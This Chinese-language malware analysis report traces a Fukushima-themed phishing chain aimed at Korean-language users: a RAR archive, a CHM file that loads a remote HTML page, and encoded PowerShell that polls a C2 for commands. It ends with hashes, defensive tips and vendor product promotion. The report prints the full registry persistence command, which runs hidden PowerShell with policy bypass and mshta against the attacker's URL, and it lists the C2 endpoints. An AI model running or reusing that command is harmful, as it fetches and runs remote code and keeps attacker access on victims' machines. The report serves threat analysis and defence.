近期，深盾实验室在运营工作中发现了一起利用日本排放核污水事件针对性钓鱼朝鲜语使用人员的相关样本。该样本针对性较高，攻击者C2使用俄罗斯境内的域名且网站部署中存在大量的俄语。该样本层层隐藏，在用户点击运行后，攻击者可以通过该样本向受害者主机投送后续恶意文件。

1. 初始攻击向量 —— Fukushima.rar

VT平台首次上传样本的国家归属地为KR - 朝鲜。

Rar文件解压后，得到译文为“福岛.chm”的文件。

2. 初始攻击向量 —— Fukushima.chm

Chm文件打开后即如下所示（左上角的小箭头即为恶意行为的触发按钮）：

通过 7zip 打开该文件，可以得到该 chm 文件的内部结构：

chm 文件被加载后将执行该Start.html文件。Start.html文件的内容如下所示，通过主动触发按钮事件，访问hxxp://navercorp.ru/dashboard/image/202302/4.html继续执行网页脚本。

3. 最终恶意文件 —— 4.html

如下所示，被远程拉取并执行的html文件实际执行了一段powershell，对数据进行Base64进行解码后得到可读的代码。

解码后的Powershell有多种功能，其通过向 

hxxp://navercorp.ru/dashboard/image/202302/com.php 

地址POST数据，获取指令并将指令执行后的结果返回。Client通过ComputerName和 UserName 进行标识。样本写入注册表持久化项达到在用户主机上长时间驻留的目的。写入的Data为：

'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html'

在样本的主循环中，每5秒向C2发送一次请求，获取C2 的指令。

对Powershell脚本部分混淆后的字符串进行重命名后，部分代码如下所示。

POST方法中，若 $InputStream 为空则表示接受C2传输的命令，若不为空则表示回传C2指令的执行结果。

一次完整的C2命令执行包含：

1. 向C2发送空POST包请求指令。

2. 解析C2发送的指令，并将指令执行后的结果[R=xxxxx]/需要的数据返回[data]。

a4ac2b37cd35ad8b4f4cb737a7dbf5ae594fc2b62fea2efa192acac4d14fe254

b31b89e646de6e9c5cbe21798e0157fef4d8e612d181085377348c974540760a

4c46216eba404588e0bacd001c8fd7c1cb2c7fbe453bc46cddca5390c5307f27

http://navercorp.ru

1.避免将重要服务在外网开放，若一定要开放，需增加口令复杂度，避免使用弱口令。

2.避免打开可疑或来历不明的邮件，尤其是其中的链接和附件等，如一定要打开未知文件，请先使用杀毒软件进行扫描。

3.安装信誉良好的防病毒/反间谍软件，定期进行系统全盘扫描，并删除检测到的威胁，按时升级打补丁。

【深信服统一端点安全管理系统aES】已支持查杀拦截此次事件使用的病毒文件，请更新软件（如有定制请先咨询售后再更新版本）和病毒库至最新版本，并接入深信服安全云脑，及时查杀新威胁；

【深信服下一代防火墙AF】的安全防护规则更新至最新版本，接入深信服安全云脑，“云鉴” 服务即可轻松抵御此高危风险。

【深信服安全感知管理平台SIP】建议用户及时更新规则库，接入深信服安全云脑，并联动【深信服下一代防火墙AF】实现对高危风险的入侵防护。

【深信服安全托管服务MSS】以保障用户网络安全“持续有效”为目标，通过将用户安全设备接入安全运营中心，依托于XDR安全能力平台和MSSP安全服务平台实现有效协同的“人机共智”模式，围绕资产、脆弱性、威胁、事件四个要素为用户提供7*24H的安全运营服务，快速扩展持续有效的安全运营能力，保障可承诺的风险管控效果。